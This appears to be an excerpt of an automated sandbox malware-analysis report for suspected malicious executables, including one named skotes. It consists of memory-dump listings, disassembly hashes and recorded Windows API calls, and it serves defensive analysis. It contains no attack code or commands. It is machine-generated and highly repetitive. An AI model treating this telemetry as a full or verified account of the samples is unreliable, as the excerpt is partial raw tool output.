Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
String ID: p[y
API String ID: 3303180142-3676765253
Opcode ID: 0f69bccaba0814c3e8ca57047a6485da99bbd75e760242b47e0746f9dda2b1a2
Instruction ID: bcb3a60cd81ba27dbc5b58b36d441e1cd3b772e0ebd2717ae5371b0f34871951
Opcode Fuzzy Hash: 0f69bccaba0814c3e8ca57047a6485da99bbd75e760242b47e0746f9dda2b1a2
Instruction Fuzzy Hash: DE01D260A05314DECB21ABF865193DC66B0AB08342F60406EE844EB282DFBC4E0983E1

Function 0074CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

CreateSemaphoreExW.KERNEL32(?,007565E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0074CAFC
CreateSemaphoreW.KERNEL32(?,007565E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0074CB1E

Strings

eu, xrefs: 0074CB12, 0074CAF0

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSemaphore
String ID: eu
API String ID: 1078844751-3704917709
Opcode ID: b6a616132594bc2fd296213872a519efeb1d1a3bb47e8b9ced46a139083590c9
Instruction ID: acbe767bd92acee220f6d30a17680d82efa74fef634c4148265ca8c3814fa3d1
Opcode Fuzzy Hash: b6a616132594bc2fd296213872a519efeb1d1a3bb47e8b9ced46a139083590c9
Instruction Fuzzy Hash: BBF0D476502169ABCF635F90EC098AE7F66FF08B60B048015FE0966130C77A9C61EFD4

Function 0075B92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0075B94E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0075B961

Strings

pContext, xrefs: 0075B959

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 2dcbe4bd1ae4f3e68fcf8973ef3a09edb9c51612344d144d631e54bf1c43effe
Instruction ID: 466ab72be42fd8ca3f4b45d1e7de7f1a34136084249435afd8814e93e848a2eb
Opcode Fuzzy Hash: 2dcbe4bd1ae4f3e68fcf8973ef3a09edb9c51612344d144d631e54bf1c43effe
Instruction Fuzzy Hash: 14E09279B40208A7CB04B7A4DC4DC9DB7799E847207148125E916A3291EBBCAA05CAD0

Function 007534CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 007534FC

Strings

pScheduler, xrefs: 007534F4
version, xrefs: 007534E1

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 6df642a822fd8c2bc4e627f85e8fdbc8cb4f0069c9f3105e174c5dc19bc0da28
Instruction ID: 533682628df937cab21aa41c2be20dade2b8b67c6e9346cd079c00a09094ea5e
Opcode Fuzzy Hash: 6df642a822fd8c2bc4e627f85e8fdbc8cb4f0069c9f3105e174c5dc19bc0da28
Instruction Fuzzy Hash: 85E08C74880248FACF26FB54CC4BAEC77689B1078AF44C126BC11611A19BFC979DDB92

Analysis Process: e66237da20.exePID: 1524, Parent PID: 2704COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 001F82B3 Relevance: 1.3, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 001F8E52

Memory Dump Source

Source File: 00000006.00000001.2794065361.00000000001F4000.00000040.00000001.01000000.00000009.sdmp, Offset: 001F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_1f4000_e66237da20.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c7dffdf3a7001af87580bf99c5f88d8b9f44d71d068cc954894fd5954516d483
Instruction ID: 1d6d7f91a61c3e9c759037fec5936f0b79811a90cef116d6dd71a5c43616b21d
Opcode Fuzzy Hash: c7dffdf3a7001af87580bf99c5f88d8b9f44d71d068cc954894fd5954516d483
Instruction Fuzzy Hash: 5FF0A9B064C30DDFD3457F38880A5BABBF0AB14A10F42456ED9C083282EE3429148A03

Function 001F8E2F Relevance: 1.3, APIs: 1, Instructions: 19
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 001F8E52

Memory Dump Source

Source File: 00000006.00000001.2794065361.00000000001F4000.00000040.00000001.01000000.00000009.sdmp, Offset: 001F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_1f4000_e66237da20.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 36ecc5d1794f04da1921b2fbe3a6385d78f5148e15c8e749465eeb313c7c30f8
Instruction ID: 7e71a45205fd6a63ab51bab9bcc307bf95c51f442413656d92516be516ff8e2d
Opcode Fuzzy Hash: 36ecc5d1794f04da1921b2fbe3a6385d78f5148e15c8e749465eeb313c7c30f8
Instruction Fuzzy Hash: 94E04FB054C715CFD341BF74884A5EABBF0EF14600F02081DD5C4C6181EB341951CA43

Function 001F8745 Relevance: 1.3, APIs: 1, Instructions: 12
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 001F8966

Memory Dump Source

Source File: 00000006.00000001.2794065361.00000000001F4000.00000040.00000001.01000000.00000009.sdmp, Offset: 001F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_1f4000_e66237da20.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 21bb9ca8f40297ad7fe9c18cd3b40da5c131c2448412555e12efc6eaadf51a75
Instruction ID: 485b561d0821a030b963ff184e8c0f31ab146db20c9bd50e4b1845ef2f6ce2f8
Opcode Fuzzy Hash: 21bb9ca8f40297ad7fe9c18cd3b40da5c131c2448412555e12efc6eaadf51a75
Instruction Fuzzy Hash: FCD05EB0408A5ACFC7011F7448093FD3F70AF01B20F921245E8E2921C0DB742560CA42

Analysis Process: b3712f1a7c.exePID: 2796, Parent PID: 2704COMMON

Executed Functions

Function 00405BFC Relevance: 282.0, APIs: 102, Strings: 58, Instructions: 2009stringkeyboardwindowCOMMON

Download Yara Rule

APIs

?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405C0F

Part of subcall function 00402017: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
Part of subcall function 00402017: CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
Part of subcall function 00402017: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
Part of subcall function 00402017: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
Part of subcall function 00402017: DispatchMessageW.USER32(?), ref: 00402069
Part of subcall function 00402017: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
Part of subcall function 00402017: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079

GetVersionExW.KERNEL32(?,?,00000000), ref: 00405C2C
GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 00405CBB

Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?), ref: 0040313F
Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB), ref: 0040315A
Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00403162
Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(00405CDB,00405CDB,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?,00000000), ref: 004031D2

lstrlenW.KERNEL32(?,00000000,00000000), ref: 00405CE6

Part of subcall function 00404D0B: #17.COMCTL32(00000000,?,?), ref: 00404D17
Part of subcall function 00404D0B: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
Part of subcall function 00404D0B: wsprintfW.USER32 ref: 00404DB8

wsprintfW.USER32 ref: 00405D45
_wtol.MSVCRT ref: 00405D7F
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 00405DCE
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 00405DE2
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,0041EA30), ref: 00405DEA

Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD

GetModuleFileNameW.KERNEL32(00000000,00000208), ref: 00405E61
_wtol.MSVCRT ref: 00405F89
??2@YAPAXI@Z.MSVCRT(00000010,00000000,0041EA30,0041EA30), ref: 00406118
??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,0041EA30,0041EA30), ref: 0040619B
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,0041EA30,0041EA30), ref: 00406211
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 0040622D
??3@YAXPAX@Z.MSVCRT(?,00000000,0041EA30,0041EA30), ref: 0040626B
wsprintfW.USER32 ref: 00406295
_wtol.MSVCRT ref: 004064B6
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00406587
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 004065D4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 004065DC
??3@YAXPAX@Z.MSVCRT(?), ref: 004065FB
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406653
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 0040665B
GetCommandLineW.KERNEL32(?,00000000,?,?), ref: 004066C3
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040673B
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00406743
